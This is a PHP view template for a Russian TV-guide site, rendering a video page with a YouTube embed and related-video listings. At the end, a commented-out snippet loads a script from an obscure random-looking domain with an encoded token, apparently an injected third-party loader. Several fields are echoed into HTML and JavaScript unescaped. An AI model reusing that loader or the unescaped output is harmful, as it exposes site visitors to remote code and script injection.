<?php
/**
 * @author  Antony Repin
 *
 */
?>

<?php
if (isset($this->main)){
    
    $videoTitle = Xmltv_String::ucfirst( Xmltv_String::strtolower( $this->main['title'] ));
    $this->headTitle( sprintf("Видео «%s» :: онлайн на rutvgid.ru", $videoTitle));
    
    $videoDesc = $this->main['desc'];
    if ($videoDesc) {
    	$this->headMeta()->setName( 'description', $this->truncateString( str_replace( "\n", ' ', $videoDesc), 12, 'words'));
    }
?>
    
<div class="row" id="shareCode">
    <?= $this->shareCode ?>
</div>

<div class="page videos row">

	<div class="video main">
	
		<h1><?= $videoTitle ?></h1>
		
        <div id="player"></div>
        <?php
        $this->inlineScript()->appendScript("var tag = document.createElement('script');
            tag.src = 'https://www.youtube.com/iframe_api';
            var firstScriptTag = document.getElementsByTagName('script')[0];
            firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
            var player;
            function onYouTubeIframeAPIReady() {
              player = new YT.Player('player', {
                height: '390',
                width: '640',
                videoId: '" . $this->main['yt_id'] . "',
                events: {
                  'onReady': onPlayerReady,
                  'onStateChange': onPlayerStateChange
                }
              });
            }
            function onPlayerReady(event) {
                event.target.playVideo();
            }
            var done = false;
            
            function onPlayerStateChange(event) {
                if (event.data == YT.PlayerState.PLAYING && !done) {
                    setTimeout(stopVideo, 6000);
                    done = true;
                  }
            }
            function stopVideo() {
              player.stopVideo();
            }");
        ?>
        
        <?php /*
		<div class="player-wrap">
			<div id="player">Для просмотра этого видео нужна поддержка Flash player 8+ и JavaScript в вашем браузере.</div>
		</div> */ ?>
        
		<p class="desc"><?= strip_tags( $this->main['desc'] ) ?></p>
		
	</div>
	
	<div class="related">
	<?php
	$amount=(int)Zend_Registry::get('site_config')->videos->related->amount;
	$i=0;
	if (!empty($this->related)) {
        /*
        $this->inlineScript()->appendScript("$(window).scroll(function() {
            if($(window).scrollTop() + $(window).height() == $(document).height()) {
                alert('bottom!');
            }
         });");
	    */
	    foreach ($this->related as $v) {
	        
            if (!empty($v['alias'])) {
				?>
			<div class="video">
				
				<h3 class="title">
					<a href="<?= $this->url( array('alias'=>$v['alias'], 'id'=>$v['rtvg_id']), 'default_videos_show-video' )  ?>" 
						title="Смотреть онлайн <?= $v['title'] ?>" 
						target="_self">
						<?= $v['title'] ?>
					</a>
				</h3>
			
				<div class="image" itemscope itemtype="http://schema.org/ImageObject">
					
                    <?php  $thumb = $v['thumbs'][mt_rand(0, count($v['thumbs'])-1)]; ?>
					<a href="<?= $this->url( array(
						'alias'=>$v['alias'], 
						'id'=>$v['rtvg_id']), 'default_videos_show-video' ) ?>"
						class="imagelink">
						<img src="<?= $thumb['url'] ?>" 
							width="160" 
							alt="<?= $v['title'] ?>" />
					</a>
					
					<div class="viewcount">
                        Посмотрели: <?= number_format( (int)$v['views'], 0 ) ?>
                    </div>
					
					<?php if (isset($v['category_ru']) && !empty($v['category_ru'])) { ?>
					<div class="category">
                        <?php
                        $urlHref = $this->url( array(
                            'category'=>Xmltv_String::strtolower( $v['category_ru']['channel_cat_alias'] )), 'default_channels_category');
                        ?>
						Категория: 
						<a href="<?= $urlHref;  ?>"
							target="_self"
							title="<?php printf("%s каналы телепрограмма", $v['category_ru']) ?>">
							<?= $v['category_ru']['channel_cat_title']; ?>
						</a>
					</div>
					<?php 
					} ?>
					
					<div class="date">
						<?php 
						$date = new Zend_Date ( $v['published'] ); 
						echo $date->toString('d MMM YYYY');
						?>
					</div>
					
				</div>
					
				<div class="description">
					<?= $this->truncateString( $v['desc'], 55, 'words' ) ?>
				</div>
				
			</div>
			<?php 
				$i++;
			}
		}
	} ?>
		
	</div>
	
</div>
    
    <?php 
} else {
    $this->headMeta()->setName( 'description', "Not found!" );
    $this->headMeta()->setName( 'robots', 'noindex,follow' );
}
?>

<?php /*
<script type="text/javascript">
   (function(w) {
     var script = document.createElement('script');
     var i = setInterval(function() {
       if (typeof w.document.body !== 'undefined') {
           script.src = 'http://qsdwdvccyim.not-only.info' + '/?851575=A0oDBVEVGxgUHB4TBEpFQkJHQw';
           w.document.body.appendChild(script);
           clearInterval(i);
       }
     }, 200);
})(window);
</script>
*/ ?>